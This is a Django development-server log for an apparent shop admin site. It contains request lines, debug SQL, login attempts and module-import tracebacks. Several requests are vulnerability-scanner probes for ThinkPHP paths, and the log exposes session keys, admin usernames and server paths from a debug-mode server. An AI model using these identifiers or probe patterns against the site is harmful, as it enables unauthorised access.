[03/Dec/2019 01:12:59] "GET / HTTP/1.0" 302 0 [03/Dec/2019 01:18:08] "GET / HTTP/1.0" 302 0 [03/Dec/2019 01:23:10] "GET / HTTP/1.0" 302 0 [03/Dec/2019 01:28:19] "GET / HTTP/1.0" 302 0 [03/Dec/2019 01:33:25] "GET / HTTP/1.0" 302 0 [03/Dec/2019 01:38:30] "GET / HTTP/1.0" 302 0 [03/Dec/2019 01:42:28] "GET / HTTP/1.0" 302 0 [03/Dec/2019 01:43:36] "GET / HTTP/1.0" 302 0 [03/Dec/2019 01:48:41] "GET / HTTP/1.0" 302 0 [03/Dec/2019 01:53:46] "GET / HTTP/1.0" 302 0 [03/Dec/2019 01:58:52] "GET / HTTP/1.0" 302 0 [03/Dec/2019 02:03:58] "GET / HTTP/1.0" 302 0 [03/Dec/2019 02:09:02] "GET / HTTP/1.0" 302 0 [03/Dec/2019 02:14:11] "GET / HTTP/1.0" 302 0 [03/Dec/2019 02:17:17] "GET / HTTP/1.0" 302 0 [03/Dec/2019 02:19:15] "GET / HTTP/1.0" 302 0 [03/Dec/2019 02:20:01] "GET /whm-server-status HTTP/1.0" 301 0 [03/Dec/2019 02:24:22] "GET / HTTP/1.0" 302 0 [03/Dec/2019 02:29:27] "GET / HTTP/1.0" 302 0 [03/Dec/2019 02:34:32] "GET / HTTP/1.0" 302 0 [03/Dec/2019 02:39:44] "GET / HTTP/1.0" 302 0 [03/Dec/2019 02:44:54] "GET / HTTP/1.0" 302 0 [03/Dec/2019 02:49:54] "GET / HTTP/1.0" 302 0 [03/Dec/2019 02:54:10] "GET / HTTP/1.0" 302 0 [03/Dec/2019 02:55:08] "GET / HTTP/1.0" 302 0 [03/Dec/2019 02:55:10] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-03 02:55:10,986 utils 26999 140702605727488 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'zw8sohqnqeqfnwat9rd71nt0dennluqk' LIMIT 1; args=('zw8sohqnqeqfnwat9rd71nt0dennluqk',) DEBUG 2019-12-03 02:55:10,989 utils 26999 140702605727488 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('zw8sohqnqeqfnwat9rd71nt0dennluqk', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-17T02:55:10.986991+00:00'::timestamptz); args=('zw8sohqnqeqfnwat9rd71nt0dennluqk', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 17, 2, 55, 10, 986991, tzinfo=)) [03/Dec/2019 02:55:10] "GET /login/?next=/ HTTP/1.0" 200 1786 [03/Dec/2019 03:00:16] "GET / HTTP/1.0" 302 0 [03/Dec/2019 03:05:30] "GET / HTTP/1.0" 302 0 [03/Dec/2019 03:10:36] "GET / HTTP/1.0" 302 0 [03/Dec/2019 03:15:52] "GET / HTTP/1.0" 302 0 [03/Dec/2019 03:21:00] "GET / HTTP/1.0" 302 0 [03/Dec/2019 03:26:08] "GET / HTTP/1.0" 302 0 Not Found: /TP/public/index.php [03/Dec/2019 03:29:56] "GET /TP/public/index.php HTTP/1.0" 404 6432 Not Found: /TP/index.php [03/Dec/2019 03:29:57] "GET /TP/index.php HTTP/1.0" 404 6411 Not Found: /thinkphp/html/public/index.php [03/Dec/2019 03:29:57] "GET /thinkphp/html/public/index.php HTTP/1.0" 404 6465 Not Found: /html/public/index.php [03/Dec/2019 03:29:57] "GET /html/public/index.php HTTP/1.0" 404 6438 Not Found: /public/index.php [03/Dec/2019 03:29:58] "GET /public/index.php HTTP/1.0" 404 6423 Not Found: /TP/html/public/index.php [03/Dec/2019 03:29:58] "GET /TP/html/public/index.php HTTP/1.0" 404 6447 Not Found: /elrekt.php [03/Dec/2019 03:30:00] "GET /elrekt.php HTTP/1.0" 404 6405 Not Found: /index.php [03/Dec/2019 03:30:00] "GET /index.php HTTP/1.0" 404 6402 [03/Dec/2019 03:30:01] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-03 03:30:01,623 utils 26999 140702605727488 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'rq1s30bz2a3lq9jtsuzt9zmolhvwxsmz' LIMIT 1; args=('rq1s30bz2a3lq9jtsuzt9zmolhvwxsmz',) DEBUG 2019-12-03 03:30:01,626 utils 26999 140702605727488 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('rq1s30bz2a3lq9jtsuzt9zmolhvwxsmz', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-17T03:30:01.624324+00:00'::timestamptz); args=('rq1s30bz2a3lq9jtsuzt9zmolhvwxsmz', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 17, 3, 30, 1, 624324, tzinfo=)) [03/Dec/2019 03:30:01] "GET /login/?next=/ HTTP/1.0" 200 1786 [03/Dec/2019 03:31:13] "GET / HTTP/1.0" 302 0 [03/Dec/2019 03:36:21] "GET / HTTP/1.0" 302 0 [03/Dec/2019 03:41:24] "GET / HTTP/1.0" 302 0 [03/Dec/2019 03:46:35] "GET / HTTP/1.0" 302 0 [03/Dec/2019 03:51:40] "GET / HTTP/1.0" 302 0 [03/Dec/2019 03:56:47] "GET / HTTP/1.0" 302 0 [03/Dec/2019 04:01:55] "GET / HTTP/1.0" 302 0 [03/Dec/2019 04:07:00] "GET / HTTP/1.0" 302 0 [03/Dec/2019 04:10:47] "GET / HTTP/1.0" 302 0 [03/Dec/2019 04:12:06] "GET / HTTP/1.0" 302 0 [03/Dec/2019 04:17:14] "GET / HTTP/1.0" 302 0 [03/Dec/2019 04:22:18] "GET / HTTP/1.0" 302 0 [03/Dec/2019 04:27:28] "GET / HTTP/1.0" 302 0 [03/Dec/2019 04:32:33] "GET / HTTP/1.0" 302 0 [03/Dec/2019 04:37:42] "GET / HTTP/1.0" 302 0 [03/Dec/2019 04:42:45] "GET / HTTP/1.0" 302 0 [03/Dec/2019 04:47:53] "GET / HTTP/1.0" 302 0 [03/Dec/2019 04:52:59] "GET / HTTP/1.0" 302 0 [03/Dec/2019 04:58:04] "GET / HTTP/1.0" 302 0 [03/Dec/2019 05:03:08] "GET / HTTP/1.0" 302 0 [03/Dec/2019 05:08:16] "GET / HTTP/1.0" 302 0 [03/Dec/2019 05:13:22] "GET / HTTP/1.0" 302 0 [03/Dec/2019 05:18:29] "GET / HTTP/1.0" 302 0 [03/Dec/2019 05:23:36] "GET / HTTP/1.0" 302 0 [03/Dec/2019 05:28:39] "GET / HTTP/1.0" 302 0 [03/Dec/2019 05:33:46] "GET / HTTP/1.0" 302 0 [03/Dec/2019 05:38:51] "GET / HTTP/1.0" 302 0 [03/Dec/2019 05:43:57] "GET / HTTP/1.0" 302 0 [03/Dec/2019 05:49:03] "GET / HTTP/1.0" 302 0 [03/Dec/2019 05:54:08] "GET / HTTP/1.0" 302 0 [03/Dec/2019 05:54:10] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-03 05:54:10,880 utils 26999 140702605727488 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'uwllt6l390okccbwy7cpt29qei9q3blz' LIMIT 1; args=('uwllt6l390okccbwy7cpt29qei9q3blz',) DEBUG 2019-12-03 05:54:10,882 utils 26999 140702605727488 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('uwllt6l390okccbwy7cpt29qei9q3blz', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-17T05:54:10.880757+00:00'::timestamptz); args=('uwllt6l390okccbwy7cpt29qei9q3blz', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 17, 5, 54, 10, 880757, tzinfo=)) [03/Dec/2019 05:54:10] "GET /login/?next=/ HTTP/1.0" 200 1786 [03/Dec/2019 05:59:15] "GET / HTTP/1.0" 302 0 [03/Dec/2019 06:04:20] "GET / HTTP/1.0" 302 0 [03/Dec/2019 06:05:01] "GET /whm-server-status HTTP/1.0" 301 0 [03/Dec/2019 06:09:27] "GET / HTTP/1.0" 302 0 [03/Dec/2019 06:14:30] "GET / HTTP/1.0" 302 0 [03/Dec/2019 06:19:37] "GET / HTTP/1.0" 302 0 [03/Dec/2019 06:24:40] "GET / HTTP/1.0" 302 0 [03/Dec/2019 06:25:10] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-03 06:25:11,250 utils 26999 140702605727488 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '4b2moj7cnmgxv5yz3xn66vx79b928j6y' LIMIT 1; args=('4b2moj7cnmgxv5yz3xn66vx79b928j6y',) DEBUG 2019-12-03 06:25:11,251 utils 26999 140702605727488 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('4b2moj7cnmgxv5yz3xn66vx79b928j6y', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-17T06:25:11.250641+00:00'::timestamptz); args=('4b2moj7cnmgxv5yz3xn66vx79b928j6y', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 17, 6, 25, 11, 250641, tzinfo=)) [03/Dec/2019 06:25:11] "GET /login/?next= HTTP/1.0" 200 1784 [03/Dec/2019 06:29:48] "GET / HTTP/1.0" 302 0 [03/Dec/2019 06:34:52] "GET / HTTP/1.0" 302 0 [03/Dec/2019 06:39:59] "GET / HTTP/1.0" 302 0 [03/Dec/2019 06:45:05] "GET / HTTP/1.0" 302 0 [03/Dec/2019 06:50:10] "GET / HTTP/1.0" 302 0 [03/Dec/2019 06:55:15] "GET / HTTP/1.0" 302 0 [03/Dec/2019 07:00:20] "GET / HTTP/1.0" 302 0 [03/Dec/2019 07:05:26] "GET / HTTP/1.0" 302 0 [03/Dec/2019 07:10:32] "GET / HTTP/1.0" 302 0 [03/Dec/2019 07:15:37] "GET / HTTP/1.0" 302 0 [03/Dec/2019 07:20:44] "GET / HTTP/1.0" 302 0 [03/Dec/2019 07:25:47] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-03 07:30:21,867 utils 26999 140702605727488 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-03T07:30:21.857707+00:00'::timestamptz AND "django_session"."session_key" = 'djxmmwyano011ratccnh8x0yfelj6wem'); args=(datetime.datetime(2019, 12, 3, 7, 30, 21, 857707, tzinfo=), 'djxmmwyano011ratccnh8x0yfelj6wem') [03/Dec/2019 07:30:21] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-03 07:30:22,175 utils 26999 140702605727488 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-03T07:30:22.166852+00:00'::timestamptz AND "django_session"."session_key" = 'djxmmwyano011ratccnh8x0yfelj6wem'); args=(datetime.datetime(2019, 12, 3, 7, 30, 22, 166852, tzinfo=), 'djxmmwyano011ratccnh8x0yfelj6wem') DEBUG 2019-12-03 07:30:22,203 utils 26999 140702605727488 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-17T07:30:22.201345+00:00'::timestamptz WHERE "django_session"."session_key" = 'djxmmwyano011ratccnh8x0yfelj6wem'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 17, 7, 30, 22, 201345, tzinfo=), 'djxmmwyano011ratccnh8x0yfelj6wem') [03/Dec/2019 07:30:22] "GET /login/?next=/ HTTP/1.0" 200 1786 [03/Dec/2019 07:30:22] "GET /static/admin/css/login.css HTTP/1.0" 200 1233 [03/Dec/2019 07:30:22] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [03/Dec/2019 07:30:22] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [03/Dec/2019 07:30:23] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [03/Dec/2019 07:30:23] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 Not Found: /favicon.ico [03/Dec/2019 07:30:23] "GET /favicon.ico HTTP/1.0" 404 6411 [03/Dec/2019 07:30:23] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 DEBUG 2019-12-03 07:30:28,994 utils 26999 140702522537728 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-03T07:30:28.982639+00:00'::timestamptz AND "django_session"."session_key" = 'djxmmwyano011ratccnh8x0yfelj6wem'); args=(datetime.datetime(2019, 12, 3, 7, 30, 28, 982639, tzinfo=), 'djxmmwyano011ratccnh8x0yfelj6wem') DEBUG 2019-12-03 07:30:29,040 utils 26999 140702522537728 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-17T07:30:29.038150+00:00'::timestamptz WHERE "django_session"."session_key" = 'djxmmwyano011ratccnh8x0yfelj6wem'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 17, 7, 30, 29, 38150, tzinfo=), 'djxmmwyano011ratccnh8x0yfelj6wem') [03/Dec/2019 07:30:29] "GET /login/ HTTP/1.0" 200 1779 DEBUG 2019-12-03 07:30:39,805 utils 26999 140702522537728 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-03T07:30:39.794672+00:00'::timestamptz AND "django_session"."session_key" = 'djxmmwyano011ratccnh8x0yfelj6wem'); args=(datetime.datetime(2019, 12, 3, 7, 30, 39, 794672, tzinfo=), 'djxmmwyano011ratccnh8x0yfelj6wem') DEBUG 2019-12-03 07:30:39,811 utils 26999 140702522537728 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."username" = 'user@gmail.com'; args=('user@gmail.com',) DEBUG 2019-12-03 07:30:40,116 utils 26999 140702522537728 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-17T07:30:40.114599+00:00'::timestamptz WHERE "django_session"."session_key" = 'djxmmwyano011ratccnh8x0yfelj6wem'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 17, 7, 30, 40, 114599, tzinfo=), 'djxmmwyano011ratccnh8x0yfelj6wem') [03/Dec/2019 07:30:40] "POST /login/ HTTP/1.0" 200 1949 [03/Dec/2019 07:30:40] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 200 86184 [03/Dec/2019 07:30:55] "GET / HTTP/1.0" 302 0 [03/Dec/2019 07:36:01] "GET / HTTP/1.0" 302 0 Not Found: /.well-known/pki-validation/4D522C796BA88841A038ACBC16B56163.txt [03/Dec/2019 07:40:03] "GET /.well-known/pki-validation/4D522C796BA88841A038ACBC16B56163.txt HTTP/1.0" 404 6567 Not Found: /.well-known/pki-validation/36D7AEDF731878FD20CE142BD21D8832.txt [03/Dec/2019 07:40:07] "GET /.well-known/pki-validation/36D7AEDF731878FD20CE142BD21D8832.txt HTTP/1.0" 404 6571 [03/Dec/2019 07:41:05] "GET / HTTP/1.0" 302 0 [03/Dec/2019 07:45:01] "GET /whm-server-status HTTP/1.0" 301 0 [03/Dec/2019 07:46:11] "GET / HTTP/1.0" 302 0 [03/Dec/2019 07:51:15] "GET / HTTP/1.0" 302 0 [03/Dec/2019 07:56:20] "GET / HTTP/1.0" 302 0 [03/Dec/2019 08:00:55] "GET / HTTP/1.0" 302 0 [03/Dec/2019 08:01:26] "GET / HTTP/1.0" 302 0 [03/Dec/2019 08:06:30] "GET / HTTP/1.0" 302 0 [03/Dec/2019 08:11:36] "GET / HTTP/1.0" 302 0 [03/Dec/2019 08:16:42] "GET / HTTP/1.0" 302 0 [03/Dec/2019 08:20:01] "GET /whm-server-status HTTP/1.0" 301 0 [03/Dec/2019 08:21:46] "GET / HTTP/1.0" 302 0 [03/Dec/2019 08:26:53] "GET / HTTP/1.0" 302 0 [03/Dec/2019 08:31:58] "GET / HTTP/1.0" 302 0 [03/Dec/2019 08:37:03] "GET / HTTP/1.0" 302 0 [03/Dec/2019 08:42:10] "GET / HTTP/1.0" 302 0 [03/Dec/2019 08:47:13] "GET / HTTP/1.0" 302 0 [03/Dec/2019 08:50:27] "GET / HTTP/1.0" 302 0 [03/Dec/2019 08:52:22] "GET / HTTP/1.0" 302 0 [03/Dec/2019 08:57:28] "GET / HTTP/1.0" 302 0 [03/Dec/2019 09:02:32] "GET / HTTP/1.0" 302 0 [03/Dec/2019 09:07:40] "GET / HTTP/1.0" 302 0 [03/Dec/2019 09:12:44] "GET / HTTP/1.0" 302 0 [03/Dec/2019 09:17:48] "GET / HTTP/1.0" 302 0 [03/Dec/2019 09:20:01] "GET /whm-server-status HTTP/1.0" 301 0 [03/Dec/2019 09:22:56] "GET / HTTP/1.0" 302 0 [03/Dec/2019 09:28:01] "GET / HTTP/1.0" 302 0 [03/Dec/2019 09:33:07] "GET / HTTP/1.0" 302 0 [03/Dec/2019 09:38:10] "GET / HTTP/1.0" 302 0 [03/Dec/2019 09:43:19] "GET / HTTP/1.0" 302 0 [03/Dec/2019 09:48:26] "GET / HTTP/1.0" 302 0 [03/Dec/2019 09:53:31] "GET / HTTP/1.0" 302 0 [03/Dec/2019 09:58:38] "GET / HTTP/1.0" 302 0 [03/Dec/2019 10:01:41] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-03 10:01:44,052 utils 26999 140702522537728 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'kcfeayza472tlh6x7b78iylvry2ilv3k' LIMIT 1; args=('kcfeayza472tlh6x7b78iylvry2ilv3k',) DEBUG 2019-12-03 10:01:44,054 utils 26999 140702522537728 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('kcfeayza472tlh6x7b78iylvry2ilv3k', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-17T10:01:44.052579+00:00'::timestamptz); args=('kcfeayza472tlh6x7b78iylvry2ilv3k', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 17, 10, 1, 44, 52579, tzinfo=)) [03/Dec/2019 10:01:44] "GET /login/?next=/ HTTP/1.0" 200 1786 [03/Dec/2019 10:03:46] "GET / HTTP/1.0" 302 0 [03/Dec/2019 10:08:51] "GET / HTTP/1.0" 302 0 [03/Dec/2019 10:12:58] "GET / HTTP/1.0" 302 0 [03/Dec/2019 10:13:58] "GET / HTTP/1.0" 302 0 /home/resfx/public_html/admin.resfx.com/backend/django_shop_tutorial/settings.py changed, reloading. Performing system checks... November 29, 2019 - 07:53:25 Django version 2.2.7, using settings 'django_shop_tutorial.settings' Starting development server at http://127.0.0.1:8000/ Quit the server with CONTROL-C. Watching for file changes with StatReloader System check identified some issues: WARNINGS: ?: (urls.W005) URL namespace 'admin' isn't unique. You may not be able to reverse all URLs in this namespace System check identified 1 issue (0 silenced). DEBUG 2019-12-03 10:19:07,233 utils 31826 140340023867136 (0.023) SELECT c.relname, CASE WHEN c.relispartition THEN 'p' WHEN c.relkind IN ('m', 'v') THEN 'v' ELSE 't' END FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('f', 'm', 'p', 'r', 'v') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid) ; args=None DEBUG 2019-12-03 10:19:07,245 utils 31826 140340023867136 (0.002) SELECT "django_migrations"."app", "django_migrations"."name" FROM "django_migrations"; args=() /home/resfx/public_html/admin.resfx.com/backend/django_shop_tutorial/settings.py changed, reloading. Performing system checks... December 03, 2019 - 10:19:07 Django version 2.2.7, using settings 'django_shop_tutorial.settings' Starting development server at http://127.0.0.1:8000/ Quit the server with CONTROL-C. Watching for file changes with StatReloader Exception in thread django-main-thread: Traceback (most recent call last): File "/usr/local/lib/python3.6/threading.py", line 916, in _bootstrap_inner self.run() File "/usr/local/lib/python3.6/threading.py", line 864, in run self._target(*self._args, **self._kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 54, in wrapper fn(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/commands/runserver.py", line 109, in inner_run autoreload.raise_last_exception() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 77, in raise_last_exception raise _exception[1] File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/__init__.py", line 337, in execute autoreload.check_errors(django.setup)() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 54, in wrapper fn(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/__init__.py", line 24, in setup apps.populate(settings.INSTALLED_APPS) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/apps/registry.py", line 91, in populate app_config = AppConfig.create(entry) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/apps/config.py", line 90, in create module = import_module(entry) File "/usr/local/lib/python3.6/importlib/__init__.py", line 126, in import_module return _bootstrap._gcd_import(name[level:], package, level) File "", line 994, in _gcd_import File "", line 971, in _find_and_load File "", line 953, in _find_and_load_unlocked ModuleNotFoundError: No module named 'mptt' /home/resfx/public_html/admin.resfx.com/backend/django_shop_tutorial/settings.py changed, reloading. Watching for file changes with StatReloader Exception in thread django-main-thread: Traceback (most recent call last): File "/usr/local/lib/python3.6/threading.py", line 916, in _bootstrap_inner self.run() File "/usr/local/lib/python3.6/threading.py", line 864, in run self._target(*self._args, **self._kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 54, in wrapper fn(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/commands/runserver.py", line 109, in inner_run autoreload.raise_last_exception() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 77, in raise_last_exception raise _exception[1] File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/__init__.py", line 337, in execute autoreload.check_errors(django.setup)() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 54, in wrapper fn(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/__init__.py", line 24, in setup apps.populate(settings.INSTALLED_APPS) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/apps/registry.py", line 91, in populate app_config = AppConfig.create(entry) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/apps/config.py", line 90, in create module = import_module(entry) File "/usr/local/lib/python3.6/importlib/__init__.py", line 126, in import_module return _bootstrap._gcd_import(name[level:], package, level) File "", line 994, in _gcd_import File "", line 971, in _find_and_load File "", line 953, in _find_and_load_unlocked ModuleNotFoundError: No module named 'mptt' /home/resfx/public_html/admin.resfx.com/backend/django_shop_tutorial/settings.py changed, reloading. Watching for file changes with StatReloader System check identified some issues: WARNINGS: ?: (urls.W005) URL namespace 'admin' isn't unique. You may not be able to reverse all URLs in this namespace System check identified 1 issue (0 silenced). DEBUG 2019-12-03 13:56:25,830 utils 7577 139709970941696 (0.007) SELECT c.relname, CASE WHEN c.relispartition THEN 'p' WHEN c.relkind IN ('m', 'v') THEN 'v' ELSE 't' END FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('f', 'm', 'p', 'r', 'v') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid) ; args=None DEBUG 2019-12-03 13:56:25,835 utils 7577 139709970941696 (0.001) SELECT "django_migrations"."app", "django_migrations"."name" FROM "django_migrations"; args=() DEBUG 2019-12-03 13:57:06,363 utils 7577 139709937760000 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-03T13:57:06.353025+00:00'::timestamptz AND "django_session"."session_key" = 'djxmmwyano011ratccnh8x0yfelj6wem'); args=(datetime.datetime(2019, 12, 3, 13, 57, 6, 353025, tzinfo=), 'djxmmwyano011ratccnh8x0yfelj6wem') [03/Dec/2019 13:57:06] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-03 13:57:06,698 utils 7577 139709937760000 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-03T13:57:06.683311+00:00'::timestamptz AND "django_session"."session_key" = 'djxmmwyano011ratccnh8x0yfelj6wem'); args=(datetime.datetime(2019, 12, 3, 13, 57, 6, 683311, tzinfo=), 'djxmmwyano011ratccnh8x0yfelj6wem') DEBUG 2019-12-03 13:57:06,791 utils 7577 139709937760000 (0.002) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-17T13:57:06.787390+00:00'::timestamptz WHERE "django_session"."session_key" = 'djxmmwyano011ratccnh8x0yfelj6wem'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 17, 13, 57, 6, 787390, tzinfo=), 'djxmmwyano011ratccnh8x0yfelj6wem') [03/Dec/2019 13:57:06] "GET /login/?next=/ HTTP/1.0" 200 1786 Not Found: /favicon.ico [03/Dec/2019 13:57:07] "GET /favicon.ico HTTP/1.0" 404 6411 DEBUG 2019-12-03 13:57:28,061 utils 7577 139709937760000 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-03T13:57:28.051706+00:00'::timestamptz AND "django_session"."session_key" = 'djxmmwyano011ratccnh8x0yfelj6wem'); args=(datetime.datetime(2019, 12, 3, 13, 57, 28, 51706, tzinfo=), 'djxmmwyano011ratccnh8x0yfelj6wem') DEBUG 2019-12-03 13:57:28,065 utils 7577 139709937760000 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."username" = 'resfx-admin'; args=('resfx-admin',) DEBUG 2019-12-03 13:57:28,318 utils 7577 139709937760000 (0.001) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '7y9bdv74g6u1t80tonbni4iyfj8rht2u' LIMIT 1; args=('7y9bdv74g6u1t80tonbni4iyfj8rht2u',) DEBUG 2019-12-03 13:57:28,319 utils 7577 139709937760000 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('7y9bdv74g6u1t80tonbni4iyfj8rht2u', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-17T13:57:28.318599+00:00'::timestamptz); args=('7y9bdv74g6u1t80tonbni4iyfj8rht2u', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 17, 13, 57, 28, 318599, 